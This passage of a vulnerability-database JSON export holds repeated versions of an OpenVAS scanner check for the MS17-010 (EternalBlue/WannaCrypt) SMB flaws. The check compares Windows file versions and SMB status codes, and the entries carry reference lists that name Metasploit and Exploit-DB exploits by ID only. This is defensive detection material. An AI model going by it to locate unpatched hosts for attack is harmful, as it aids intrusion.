Error: STATUS_INSUFF_SERVER_RESOURCES\n## If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine\n## does not have the MS17-010 patch. 
After the patch, \"STATUS_ACCESS_DENIED\",\n## \"STATUS_INVALID_HANDLE\".\nif(ord(smb_trans_resp[9]) == 5 && ord(smb_trans_resp[10]) == 2 &&\n ord(smb_trans_resp[11]) == 0 && ord(smb_trans_resp[12]) == 192)\n{\n security_message(port:smbPort );\n close(soc);\n exit(0);\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins", "_object_type": "robots.models.openvas.OpenVASBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openvas.OpenVASBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "OPENVAS:1361412562310810810", "hash": "1063224037d1de9e658701a5b387a0d8", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)", "description": "This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)", "published": "2017-03-15T00:00:00", "modified": "2020-06-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810810", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-in/kb/4013078", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks", "http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2020-06-08T23:21:25", "history": [{"bulletin": {"id": "OPENVAS:1361412562310810810", "hash": "13dbacfea9ccc7b4170f350c89fe5df51259cc399304c94a2b7770a0daf674c4", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)", "description": "This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)", "published": "2017-03-15T00:00:00", "modified": 
"2020-06-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810810", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-in/kb/4013078", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks", "http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2020-06-05T17:22:59", "history": [], "viewCount": 2569, "enchantments": {"dependencies": {"modified": "2020-06-05T17:22:59", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": 
"rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/LOCAL/COMAHAWK", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", 
"MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-06-05T17:22:59", "rev": 2, "value": 8.1, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810810", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810810\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-05 10:05:11 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 09:07:19 +0530 (Wed, 15 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests(WannaCrypt).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also could\n lead to information disclosure from the server.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 2003 x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows XP SP2 x64\n\n - Microsoft Windows XP SP3 x86\n\n - Microsoft Windows 8 x86/x64\n\n - 
Microsoft Windows 10 x32/x64\n\n - Microsoft Windows Server 2012\n\n - Microsoft Windows Server 2016\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012 R2\n\n - Microsoft Windows 7 x32/x64 Service Pack 1\n\n - Microsoft Windows Vista x32/x64 Service Pack 2\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\");\n script_xref(name:\"URL\", value:\"https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, win8:1, win8x64:1,\n winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2,\n winVistax64:3, win2008x64:3, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1,\n win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nvistVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\srv.sys\");\nif(vistVer)\n{\n if(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n {\n if(version_is_less(version:vistVer, 
test_version:\"6.0.6002.19743\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19743\";\n VULN1 = TRUE ;\n }\n\n else if(version_in_range(version:vistVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.24066\"))\n {\n Vulnerable_range1 = \"6.0.6002.22000 - 6.0.6002.24066\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(xp:4) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.1.2600.7208\"))\n {\n Vulnerable_range1 = \"Less than 5.1.2600.7208\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.2.3790.6021\"))\n {\n Vulnerable_range1 = \"Less than 5.2.3790.6021\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win8:1, win8x64:1) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.2.9200.22099\"))\n {\n Vulnerable_range1 = \"Less than 6.2.9200.22099\";\n VULN1 = TRUE ;\n }\n }\n\n if(VULN1)\n {\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 'File version: ' + vistVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range1 + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(winVer)\n{\n if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && winVer)\n {\n if(version_is_less(version:winVer, test_version:\"6.1.7601.23677\"))\n {\n Vulnerable_range = \"Less than 6.1.7601.23677\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win2012:1) > 0)\n {\n if(version_is_less(version:winVer, test_version:\"6.2.9200.22097\"))\n {\n Vulnerable_range = \"Less than 6.2.9200.22097\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) > 0)\n {\n if(version_is_less(version:winVer, 
test_version:\"6.3.9600.18603\"))\n {\n Vulnerable_range = \"Less than 6.3.9600.18603\";\n VULN = TRUE ;\n }\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\win32k.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) > 0)\n{\n if(version_is_less(version:edgeVer, test_version:\"11.0.10240.17319\"))\n {\n Vulnerable_range = \"Less than 11.0.10240.17319\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.10586.0\", test_version2:\"11.0.10586.838\"))\n {\n Vulnerable_range = \"11.0.10586.0 - 11.0.10586.838\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.952\"))\n {\n Vulnerable_range = \"11.0.14393.0 - 11.0.14393.952\";\n VULN = TRUE ;\n }\n\n if(VULN)\n {\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins"}, "differentElements": ["modified", "sourceData"], "edition": 9, "lastseen": "2020-06-05T17:22:59"}, {"bulletin": {"id": "OPENVAS:1361412562310810810", "hash": "3c8a198e6ef21cb8cce62b81673e752a5a10f07a825b00d11a3178fa4d966c82", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)", "description": "This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)", "published": "2017-03-15T00:00:00", "modified": "2019-12-20T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810810", 
"reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://support.microsoft.com/en-in/kb/4013078", "https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks", "http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2020-01-08T13:43:59", "history": [], "viewCount": 2565, "enchantments": {"dependencies": {"modified": "2020-01-08T13:43:59", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", 
"CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", 
"1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-01-08T13:43:59", "rev": 2, "value": 8.0, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810810", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810810\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-0143\", \"CVE-2017-0144\", \"CVE-2017-0145\", \"CVE-2017-0146\",\n \"CVE-2017-0147\", \"CVE-2017-0148\");\n script_bugtraq_id(96703, 96704, 96705, 96707, 96709, 96706);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-15 09:07:19 +0530 (Wed, 15 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows SMB Server Multiple Vulnerabilities (4013389)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an critical security\n update according to Microsoft Bulletin MS17-010(WannaCrypt)\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to the way that the\n Microsoft Server Message Block 1.0 (SMBv1) server handles certain\n requests(WannaCrypt).\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain the ability to execute code on the target server, also could\n lead to information disclosure from the server.\");\n script_tag(name:\"affected\", value:\"- Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n\n - Microsoft Windows XP SP2 x64\n\n - Microsoft Windows XP SP3 x86\n\n - Microsoft Windows 8 x86/x64\n\n 
- Microsoft Windows 10 x32/x64 Edition\n\n - Microsoft Windows Server 2012 Edition\n\n - Microsoft Windows Server 2016\n\n - Microsoft Windows 8.1 x32/x64 Edition\n\n - Microsoft Windows Server 2012 R2 Edition\n\n - Microsoft Windows 7 x32/x64 Edition Service Pack 1\n\n - Microsoft Windows Vista x32/x64 Edition Service Pack 2\n\n - Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1\n\n - Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/kb/4013078\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS17-010\");\n script_xref(name:\"URL\", value:\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\");\n script_xref(name:\"URL\", value:\"https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, win8:1, win8x64:1,\n winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2,\n winVistax64:3, win2008x64:3, win2012:1, win2012R2:1, win8_1:1, win8_1x64:1,\n win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nvistVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\srv.sys\");\nif(vistVer)\n{\n if(hotfix_check_sp(winVista:3, winVistax64:3, 
win2008:3, win2008x64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.0.6002.19743\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19743\";\n VULN1 = TRUE ;\n }\n\n else if(version_in_range(version:vistVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.24066\"))\n {\n Vulnerable_range1 = \"6.0.6002.22000 - 6.0.6002.24066\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(xp:4) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.1.2600.7208\"))\n {\n Vulnerable_range1 = \"Less than 5.1.2600.7208\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"5.2.3790.6021\"))\n {\n Vulnerable_range1 = \"Less than 5.2.3790.6021\";\n VULN1 = TRUE ;\n }\n }\n\n ## http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598\n else if(hotfix_check_sp(win8:1, win8x64:1) > 0)\n {\n if(version_is_less(version:vistVer, test_version:\"6.2.9200.22099\"))\n {\n Vulnerable_range1 = \"Less than 6.2.9200.22099\";\n VULN1 = TRUE ;\n }\n }\n\n if(VULN1)\n {\n report = 'File checked: ' + sysPath + \"\\drivers\\srv.sys\" + '\\n' +\n 